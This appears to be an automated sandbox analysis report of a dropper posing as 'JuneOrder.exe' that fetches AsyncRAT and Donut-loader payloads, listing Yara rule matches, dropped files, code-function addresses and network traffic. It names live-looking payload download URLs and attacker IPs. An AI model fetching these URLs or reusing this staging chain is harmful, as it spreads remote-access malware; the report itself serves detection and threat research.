                Source: CoinAIfdp.exe, 00000006.00000002.1627907131.0000000002D66000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: JuneOrder.exe, 00000000.00000003.1632060331.0000000002257000.00000004.00000020.00020000.00000000.sdmp, JuneOrder.exe, 00000000.00000003.1632161007.0000000002100000.00000004.00000020.00020000.00000000.sdmp, BC31.bat.0.drString found in binary or memory: https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg
                Source: CoinAIfdp.exe, 00000006.00000002.1627907131.0000000002D66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                Source: CoinAIfdp.exe, 00000006.00000002.1627907131.0000000002D66000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.2727513271.0000000002A03000.00000004.00000800.00020000.00000000.sdmp, CoinAIfdp.exe, 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 00000011.00000002.1800707504.00000000023D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/qNzy/OfCN.bin
                Source: JuneOrder.exe, 00000000.00000003.1632060331.0000000002257000.00000004.00000020.00020000.00000000.sdmp, JuneOrder.exe, 00000000.00000003.1632161007.0000000002100000.00000004.00000020.00020000.00000000.sdmp, JuneOrder.exe, 00000000.00000003.1632060331.0000000002250000.00000004.00000020.00020000.00000000.sdmp, BC31.bat.0.drString found in binary or memory: https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownHTTPS traffic detected: 34.117.33.233:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.33.233:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.8:49709 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.55b128d.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.svchst.exe.2c66795.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6040000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.2de76a1.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2a067bd.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 3796, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 4920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 6788, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 2396, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPED

                System Summary

                barindex
                Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: sslproxydump.pcap, type: PCAPMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 6.2.CoinAIfdp.exe.55b128d.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 6.2.CoinAIfdp.exe.55b128d.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 6.2.CoinAIfdp.exe.55b128d.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 13.2.svchst.exe.2c66795.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 13.2.svchst.exe.2c66795.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 13.2.svchst.exe.2c66795.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 6.2.CoinAIfdp.exe.6040000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 6.2.CoinAIfdp.exe.6040000.3.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000F.00000002.2725016473.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000010.00000002.1721681170.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000011.00000002.1800707504.00000000028C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000D.00000002.1705552940.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 00000006.00000002.1627064345.0000000000EE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 00000011.00000002.1799807580.0000000000821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000F.00000002.2727513271.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 0000000F.00000002.2727513271.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000F.00000002.2725016473.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: Process Memory Space: CoinAIfdp.exe PID: 3796, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: Process Memory Space: CoinAIfdp.exe PID: 3796, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: Process Memory Space: svchst.exe PID: 4920, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: Process Memory Space: svchst.exe PID: 4920, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: Process Memory Space: svchst.exe PID: 6788, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: Process Memory Space: svchst.exe PID: 6788, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: Process Memory Space: CoinAIfdp.exe PID: 2396, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: Process Memory Space: CoinAIfdp.exe PID: 2396, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: Process Memory Space: svchst.exe PID: 1608, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: initial sampleStatic PE information: Filename: JuneOrder.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeJump to dropped file
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_0040C8980_2_0040C898
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_0040E9500_2_0040E950
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_004109100_2_00410910
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_004109D90_2_004109D9
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_004105E00_2_004105E0
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_004115800_2_00411580
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_004109930_2_00410993
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_004106000_2_00410600
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_0040B3470_2_0040B347
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_0040F3C80_2_0040F3C8
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_02D3A2046_2_02D3A204
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_02D347486_2_02D34748
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_02D3D5B06_2_02D3D5B0
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_02D38B706_2_02D38B70
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_02D3C1D86_2_02D3C1D8
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_02D38B616_2_02D38B61
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_02D309706_2_02D30970
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_02D309606_2_02D30960
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_02D30DD76_2_02D30DD7
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_02D30DE86_2_02D30DE8
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_052155886_2_05215588
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_052158256_2_05215825
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_052122296_2_05212229
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_052122386_2_05212238
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055BD0C06_2_055BD0C0
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055BE3786_2_055BE378
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055BDF9C6_2_055BDF9C
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055BE7A86_2_055BE7A8
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055BF25C6_2_055BF25C
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055C1A546_2_055C1A54
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055EA0006_2_055EA000
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055D00406_2_055D0040
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055E94E06_2_055E94E0
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055EBA786_2_055EBA78
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_00E8A20413_2_00E8A204
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_00E8D5B913_2_00E8D5B9
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_00E8474813_2_00E84748
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_00E88B7013_2_00E88B70
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_00E8C1D813_2_00E8C1D8
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_00E8097013_2_00E80970
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_00E88B6D13_2_00E88B6D
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_00E80DE813_2_00E80DE8
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_05072F7013_2_05072F70
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_05072F8013_2_05072F80
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_0507222913_2_05072229
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_0507223813_2_05072238
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_0545A00013_2_0545A000
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_0544004013_2_05440040
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_0544000613_2_05440006
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_054594E013_2_054594E0
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_0545BA7813_2_0545BA78
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E2A20415_2_00E2A204
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E2D5B015_2_00E2D5B0
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E2474815_2_00E24748
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E28B7015_2_00E28B70
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E2C1D815_2_00E2C1D8
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E2473815_2_00E24738
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E2096015_2_00E20960
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E2097015_2_00E20970
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E28B6115_2_00E28B61
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E20DE815_2_00E20DE8
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_00E20DD715_2_00E20DD7
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F4BC4015_2_04F4BC40
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F4AE1015_2_04F4AE10
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F4223815_2_04F42238
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F4222915_2_04F42229
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F43CE915_2_04F43CE9
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F42F8015_2_04F42F80
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F42F7015_2_04F42F70
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F4A8C015_2_04F4A8C0
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0532A00015_2_0532A000
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_053294E015_2_053294E0
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0531000715_2_05310007
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0531004015_2_05310040
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0532BA7815_2_0532BA78
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_06AD004015_2_06AD0040
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0282A20416_2_0282A204
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0282474816_2_02824748
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0282D5B016_2_0282D5B0
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_02828B7016_2_02828B70
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0282C1EB16_2_0282C1EB
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_02828B6116_2_02828B61
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0282097016_2_02820970
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_02820DE816_2_02820DE8
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_04EA2F8016_2_04EA2F80
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_04EA2F7016_2_04EA2F70
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_04EA222916_2_04EA2229
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_04EA223816_2_04EA2238
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0528A00016_2_0528A000
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_052894E016_2_052894E0
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0527000616_2_05270006
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0527004016_2_05270040
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0528BA7816_2_0528BA78
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_00AAA20417_2_00AAA204
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_00AAD5B017_2_00AAD5B0
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_00AA474817_2_00AA4748
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_00AA8B7017_2_00AA8B70
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_00AAC1D817_2_00AAC1D8
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_00AA097017_2_00AA0970
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_00AA8B6117_2_00AA8B61
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_00AA0DE817_2_00AA0DE8
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_048E222917_2_048E2229
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_048E223817_2_048E2238
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_04CCA00017_2_04CCA000
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_04CC94E017_2_04CC94E0
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_04CB004017_2_04CB0040
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_04CB000717_2_04CB0007
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_04CCBA7817_2_04CCBA78
                Source: JuneOrder.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: sslproxydump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
